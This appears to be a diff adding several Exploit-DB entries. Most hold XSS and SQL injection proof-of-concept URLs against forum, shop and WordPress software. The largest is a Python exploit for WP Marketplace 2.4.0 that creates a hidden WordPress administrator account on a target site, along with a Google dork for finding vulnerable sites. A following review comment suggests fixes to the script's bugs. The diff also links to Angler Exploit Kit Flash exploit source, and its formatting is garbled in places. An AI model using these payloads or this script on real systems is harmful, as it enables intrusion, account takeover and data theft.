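+source: http://www.securityfocus.com/bid/51227/info
+
+FuseTalk Forums is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+FuseTalk Forums 3.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/login.cfm?windowed=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E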
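--- a/platforms/php/webapps/36486.txt
+++ b/platforms/php/webapps/36486.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/51240/info
+
+Tienda Virtual is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+The following example URIs are available:
+
+http://www.example.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--
+
+http://www.example.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--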
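--- a/platforms/php/webapps/36487.txt
+++ b/platforms/php/webapps/36487.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51241/info
+
+The Comment Rating plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex=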
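--- a/platforms/php/webapps/36488.txt
+++ b/platforms/php/webapps/36488.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51244/info
+
+WHOIS for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+WHOIS 1.4.2.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[path]/wp-content/plugins/wp-whois/wp-whois-ajax.php?cmd=wpwhoisform&ms=Xss?domain=[xss]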
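--- a/platforms/php/webapps/36489.txt
+++ b/platforms/php/webapps/36489.txt
@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/51254/info
+
+TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+TextPattern 4.4.1 is vulnerable; other versions may also be affected.
+
+POST /textpattern/setup/index.php HTTP/1.1
+
+Host: A.B.C.D
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
+Gecko/20100101 Firefox/8.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip, deflate
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+Proxy-Connection: keep-alive
+Referer: http://www.example.com/textpattern/setup/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 156
+
+duser=blah&dpass=&dhost=localhost&ddb=%3Cscript%3Ealert%28%27123%27%29%3C%2
+Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=print
+Config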
183
platforms/php/webapps/36490.py
183
platforms/php/webapps/36490.py
|
@ -0,0 +1,183 @@
|
|||
#!/usr/bin/python
|
||||
#
|
||||
# Exploit Name: WP Marketplace 2.4.0 Remote Command Execution
|
||||
#
|
||||
# Vulnerability discovered by Kacper Szurek (http://security.szurek.pl)
|
||||
#
|
||||
# Exploit written by Claudio Viviani
|
||||
#
|
||||
#
|
||||
#
|
||||
# --------------------------------------------------------------------
|
||||
#
|
||||
# The vulnerable function is located on "wpmarketplace/libs/cart.php" file:
|
||||
#
|
||||
# function ajaxinit(){
|
||||
# if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
|
||||
# if(function_exists($_POST['execute']))
|
||||
# call_user_func($_POST['execute'],$_POST);
|
||||
# else
|
||||
# echo __("function not defined!","wpmarketplace");
|
||||
# die();
|
||||
# }
|
||||
#}
|
||||
#
|
||||
# Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook).
|
||||
# wpmp_pp_ajax_call() call functions by call_user_func() through POST data:
|
||||
#
|
||||
# if (function_exists($_POST['execute']))
|
||||
# call_user_func($_POST['execute'], $_POST);
|
||||
# else
|
||||
# ...
|
||||
# ...
|
||||
# ...
|
||||
#
|
||||
# $_POST data needs to be an array
|
||||
#
|
||||
#
|
||||
# The wordpress function wp_insert_user is perfect:
|
||||
#
|
||||
# http://codex.wordpress.org/Function_Reference/wp_insert_user
|
||||
#
|
||||
# Description
|
||||
#
|
||||
# Insert a user into the database.
|
||||
#
|
||||
# Usage
|
||||
#
|
||||
# <?php wp_insert_user( $userdata ); ?>
|
||||
#
|
||||
# Parameters
|
||||
#
|
||||
# $userdata
|
||||
# (mixed) (required) An array of user data, stdClass or WP_User object.
|
||||
# Default: None
|
||||
#
|
||||
#
|
||||
#
|
||||
# Evil POST Data (Add new Wordpress Administrator):
|
||||
#
|
||||
# action=wpmp_pp_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
|
||||
#
|
||||
# ---------------------------------------------------------------------
|
||||
#
|
||||
# Dork google: index of "wpmarketplace"
|
||||
#
|
||||
# Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6
|
||||
#
|
||||
# Http connection
|
||||
import urllib, urllib2, socket
|
||||
#
|
||||
import sys
|
||||
# String manipulator
|
||||
import string, random
|
||||
# Args management
|
||||
import optparse
|
||||
|
||||
# Check url
|
||||
def checkurl(url):
|
||||
if url[:8] != "https://" and url[:7] != "http://":
|
||||
print('[X] You must insert http:// or https:// procotol')
|
||||
sys.exit(1)
|
||||
else:
|
||||
return url
|
||||
|
||||
# Check if file exists and has readable
|
||||
def checkfile(file):
|
||||
if not os.path.isfile(file) and not os.access(file, os.R_OK):
|
||||
print '[X] '+file+' file is missing or not readable'
|
||||
sys.exit(1)
|
||||
else:
|
||||
return file
|
||||
|
||||
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
|
||||
return ''.join(random.choice(chars) for _ in range(size))
|
||||
|
||||
banner = """
|
||||
___ ___ __
|
||||
| Y .-----.----.--| .-----.----.-----.-----.-----.
|
||||
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|
||||
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|
||||
|: | |__|
|
||||
|::.|:. |
|
||||
`--- ---'
|
||||
___ ___ __ __ __
|
||||
| Y .---.-.----| |--.-----| |_.-----| .---.-.----.-----.
|
||||
|. | _ | _| <| -__| _| _ | | _ | __| -__|
|
||||
|. \_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____|
|
||||
|: | | |__|
|
||||
|::.|:. |
|
||||
`--- ---'
|
||||
WP Marketplace
|
||||
R3m0t3 C0d3 Ex3cut10n
|
||||
(Add WP Admin)
|
||||
v2.4.0
|
||||
|
||||
Written by:
|
||||
|
||||
Claudio Viviani
|
||||
|
||||
http://www.homelab.it
|
||||
|
||||
info@homelab.it
|
||||
homelabit@protonmail.ch
|
||||
|
||||
https://www.facebook.com/homelabit
|
||||
https://twitter.com/homelabit
|
||||
https://plus.google.com/+HomelabIt1/
|
||||
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
|
||||
"""
|
||||
|
||||
commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
|
||||
commandList.add_option('-t', '--target', action="store",
|
||||
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
|
||||
)
|
||||
commandList.add_option('--timeout', action="store", default=10, type="int",
|
||||
help="[Timeout Value] - Default 10",
|
||||
)
|
||||
|
||||
options, remainder = commandList.parse_args()
|
||||
|
||||
# Check args
|
||||
if not options.target:
|
||||
print(banner)
|
||||
commandList.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
host = checkurl(options.target)
|
||||
timeout = options.timeout
|
||||
|
||||
print(banner)
|
||||
|
||||
socket.setdefaulttimeout(timeout)
|
||||
|
||||
username = id_generator()
|
||||
pwd = id_generator()
|
||||
|
||||
body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call',
|
||||
'execute' : 'wp_insert_user',
|
||||
'user_login' : username,
|
||||
'user_pass' : pwd,
|
||||
'role' : 'administrator'})
|
||||
|
||||
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
|
||||
|
||||
print "[+] Tryng to connect to: "+host
|
||||
try:
|
||||
req = urllib2.Request(host+"/", body, headers)
|
||||
response = urllib2.urlopen(req)
|
||||
html = response.read()
|
||||
|
||||
if html == "":
|
||||
print("[!] Account Added")
|
||||
print("[!] Location: "+host+"/wp-login.php")
|
||||
print("[!] Username: "+username)
|
||||
print("[!] Password: "+pwd)
|
||||
else:
|
||||
print("[X] Exploitation Failed :(")
|
||||
|
||||
except urllib2.HTTPError as e:
|
||||
print("[X] "+str(e))
|
||||
except urllib2.URLError as e:
|
||||
print("[X] Connection Error: "+str(e))
|
||||
|
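Review bot: `checkfile` calls `os.path.isfile` and `os.access`, but `os` is never imported (the import block only brings in urllib, urllib2, socket, sys, string, random and optparse), so the function would raise NameError the moment it is called; it is also never called, and its condition joins the two checks with `and`, so an existing-but-unreadable file passes. Either drop the function or add `import os` beside the other imports and change the test to `if not os.path.isfile(file) or not os.access(file, os.R_OK):`. The success oracle `if html == "":` treats any empty response body as a created account, which is a weak signal and will misreport on sites that return nothing for an unrelated reason, so the printed credentials should be labelled as unverified. The file also mixes Python 2 print statements (`print '[X] '+file+...`, `print "[+] Tryng to connect to: "+host`) with `print(...)` calls, which pins it to Python 2 without saying so in the header. On the defence side, a POST to the site root carrying `action=wpmp_pp_ajax_call` together with `execute=wp_insert_user` is a precise signature for web-server log review and WAF rules while this plugin version is exposed.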
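--- a/platforms/windows/remote/36491.txt
+++ b/platforms/windows/remote/36491.txt
@@ -0,0 +1,11 @@
+Source: https://github.com/SecurityObscurity/cve-2015-0313
+
+PoC: http://www.exploit-db.com/sploits/36491.zip
+
+Adobe Flash vulnerability source code (cve-2015-0313) from Angler Exploit Kit
+
+Reference:
+
+http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/
+http://malware.dontneedcoffee.com/2015/02/cve-2015-0313-flash-up-to-1600296-and.html
+https://helpx.adobe.com/security/products/flash-player/apsa15-02.html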